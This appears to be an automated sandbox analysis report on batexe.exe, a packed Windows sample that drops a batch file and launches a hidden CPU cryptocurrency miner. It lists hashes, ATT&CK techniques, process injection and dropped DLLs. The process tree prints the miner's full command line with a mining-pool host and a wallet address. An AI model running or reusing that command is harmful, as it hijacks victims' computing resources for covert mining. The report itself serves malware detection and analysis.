73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
296s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13/02/2024, 07:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3684	b2e.exe
100	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
100	cpuminer-sse2.exe
100	cpuminer-sse2.exe
100	cpuminer-sse2.exe
100	cpuminer-sse2.exe
100	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3148-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3148 wrote to memory of 3684	3148	batexe.exe	84
PID 3148 wrote to memory of 3684	3148	batexe.exe	84
PID 3148 wrote to memory of 3684	3148	batexe.exe	84
PID 3684 wrote to memory of 5624	3684	b2e.exe	86
PID 3684 wrote to memory of 5624	3684	b2e.exe	86
PID 3684 wrote to memory of 5624	3684	b2e.exe	86
PID 5624 wrote to memory of 100	5624	cmd.exe	88
PID 5624 wrote to memory of 100	5624	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3148
- C:\Users\Admin\AppData\Local\Temp\956A.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\956A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\956A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9896.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5624
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:100

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\956A.tmp\b2e.exe

Filesize
4.7MB

MD5
2072ae019f36ace2e47588f26d9d7588

SHA1
43b77e4e3c28e5642cbc07d5a1682bd76599810c

SHA256
6f31e2f7fe87b043ce8a71f686b1f201e24208a57c5af92a2845d2d9ce6d1e28

SHA512
5763a308141579125507301ad3480549fd95a37b536f2e4c6f8813f18cda9bde3a9f61c33e78912ec3b9d3f78afc5ddc4b44deefbad5311b0ddba66d9e344956

Download Submit
C:\Users\Admin\AppData\Local\Temp\956A.tmp\b2e.exe

Filesize
2.4MB

MD5
ee04099ca04456aa3ec3263fc8478095

SHA1
dc89b1634e0fff0e8203cfcfe26600eb97514e7d

SHA256
97d4085421fc14574d853c4bd8eef8f0a70aad1666fba5a51549d26abfc63dd3

SHA512
6bbcf992e0a1d670a0e861ceefcc03bec5cd5b1f9082ccd4324cca368665b135d63a332cf76bea1ffbadb409078c83d8f31c02141c6d1d053c7ceb937b68531e

Download Submit
C:\Users\Admin\AppData\Local\Temp\956A.tmp\b2e.exe

Filesize
1.5MB

MD5
d1bf0e3104aa379ac0d547e2d55b5930

SHA1
b9c35a37ff70ffca21648777b4e1b78d463ce214

SHA256
cf726be9879a0ae8d7fbda6619d3b125423c963b566a3694230bca37cca35b7d

SHA512
4a2e9901453466f388a416ca1af9b32093f4e36f3e429f34b09e8cf45238100c64aff90d8942b7f6f95a7f1304145ba3481248c125e9834529cc3a9b96ad6670

Download Submit
C:\Users\Admin\AppData\Local\Temp\9896.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
19KB

MD5
5f6356a569c7b4d3fc5ee0fc537f6e08

SHA1
49e80ad3d4886ac22649b29acdca02c27b4898b6

SHA256
7b552d37a8cc380ea5de9420a03f8daaf2d398174d37fd7d67403ecd120df58c

SHA512
0f3939b663044fc43681a62c66438723a9cd6e1bbac249147234db7b57fdb24e87339899c1847f2c6560d137e0b9c729e1ee4cc2c27c08fe5557610e430821d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
738KB

MD5
cd4180a2a1a0e3c151a52bcd2734f684

SHA1
b77290b38ef2d2586c61d3cb7fd4e624cf0a438f

SHA256
742095791a9e9de2917facde6b2ad6f29ca2d333f4c70bff534d4a146c3751a6

SHA512
6183cd745ef86ad7dad7bb2f6a3beec70f9e393dc08ad2807886634626354ae17be5ef454a0944ef3a033e28e708636fca75786ca00809e3fbcd7d9b6c6a10c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
343KB

MD5
04901b83e284fc1ecd529c778eaca392

SHA1
c3291bce030c75f2d2ae9ce2af7d056cbd8410bb

SHA256
2d5049e34ea71e866e8b1151664db70cb57d3439cd2564ddeab6cbdc403ca855

SHA512
624eb266d4abce95d08f67d3e0d84e60731da0b8a29d01d7a9b2a4e0b445b19b33c3f7dae2409e95bec6bfff04fc3c0fee50a9c8e077fd3dd9b7f32c623aa69e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
208KB

MD5
9282e1b699ec3ff96970fffec42d521e

SHA1
ff8368e2a124ce3d9c518e4de2444f17289fa12d

SHA256
9ec7b96100ace38312f41ef1ab73126c7f90e7239a2d5de49f25702db958c6a2

SHA512
73fa460a1fa195617b6ba71247f695ec95f0fb00474133a27b7d9109de718b45679e75e00ed9c9f72c7dc2d13885fa4b9731e52b1afa41fcb2ef3a165f662ade

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
545KB

MD5
e1e5139da9aaeb6fabfc5ef2120410d2

SHA1
f7afe42abd937e3423e4f8bb5cfa13059386f7fc

SHA256
f6918acd9c68aefed69f1e4b4c8cb66880cada88b97606494efa271118b274b7

SHA512
146d51fdce709dafa85ad0a38a6e6fc03075ece2649f5c8c2f6089b2517bcea11c2ebd9399f428d4dad88eff84b3e0b736464f17c1173ad6fbb7a04a40905705

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
532KB

MD5
04be867b77c5e2114d00e86ba8ec6c9a

SHA1
33cffbc9e8b08ce0841c5719305d7aedba9e358c

SHA256
ad732ca755851be68b26cb55f8d6e7819838eb02c6b639b168133cdce5f33eb0

SHA512
ba29f47ae6c3c35c3e03cc74949f90c96f28ee56208900d0a7b0fa167279d94d70f910895b93cc66b52a58c3461d9d1c15c3756aef86e19facd375417373b05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
228KB

MD5
1fe566322dc5c5a47d2bc18f8e04eb12

SHA1
5be103bc46b16331e6c4206023957601cd4354d2

SHA256
83ce532db9c68f038bf79cad66497f780e7e8e752026894348e28c6fac1f4ffe

SHA512
4a4c99b525378438708b542db262ae83627373737ce02c282356e922be9d592ec75ff65d5f05ef6e622cd5d2b8a10663bc2d66a24d9a669f8bdda9892c74bb4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
601KB

MD5
3742c4397df2ad69c5f7650c0c2d4a1b

SHA1
b4f711c90f675b828be272c1309e9467dbf98fff

SHA256
ea5340ced9921d17687824b2d627855dce9376c564cca003e07175fb8abc7796

SHA512
7cb92c28953adef15ddc04a457c5321fd9a4644a59c3517825808a224b18408971e32fb764db6e6801451942c917cef8c05502c1cc1e2626dd5aa3778e12b717

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
760KB

MD5
4df9b08b908e9a060bfb4d14da86f190

SHA1
1d596a6c35c5ea09fe57184fa00c72ea2023b756

SHA256
ded9c3da6e067d429eb27b4813e7a212abf1951b3aab2b9cd7ffbd9a5e43ee4d

SHA512
ad17042a63684290c8c4c6fc6bd1c45baf7e02cfb8682273897b829f5eb1b1e8d402a55efde27326ce55a86e440167b7690036a9cd9fb40e1f6c7a3407d23037

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
579KB

MD5
b99b2588e111ea54f9da7ccd3a1a5cf9

SHA1
46b700d6cbf067f8d810818ecaf463e851228014

SHA256
abfa60c6e4b4439878f854305ce949efc6bdb94cd914240eb19c8a932b957482

SHA512
63f6894fffecd01fe17cd15c76e8d4df49d5ce3ffa91f0adbe1b52f2e7b99769c03c57c7d1b91f2190e3cc74965bffc5e3fb084f6154c3b0e7efe10c61def009

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
596KB

MD5
e82c8e9f0ad818a1c902be99308e2c42

SHA1
2be1c932467a8bc600b6543f5baf96deae51ca28

SHA256
7c34bccdaec9a34867805c886e605257b133df645d88ee0b1542d47baf915ed6

SHA512
226baebdd1ec90b4f65681eccc9f8363865d8a5d5cbf57238800a3468f698abb1e36eb322043c747a385a0746131451b5b95afccdbb58fc90907c407abb1cc2c

Download Submit
memory/100-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/100-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/100-46-0x00000000569B0000-0x0000000056A48000-memory.dmp

Filesize
608KB

Download
memory/100-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/100-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/100-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/100-47-0x0000000001010000-0x00000000028C5000-memory.dmp

Filesize
24.7MB

Download
memory/100-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/100-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/100-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/100-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/100-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/100-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/100-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/100-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3148-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3684-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3684-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download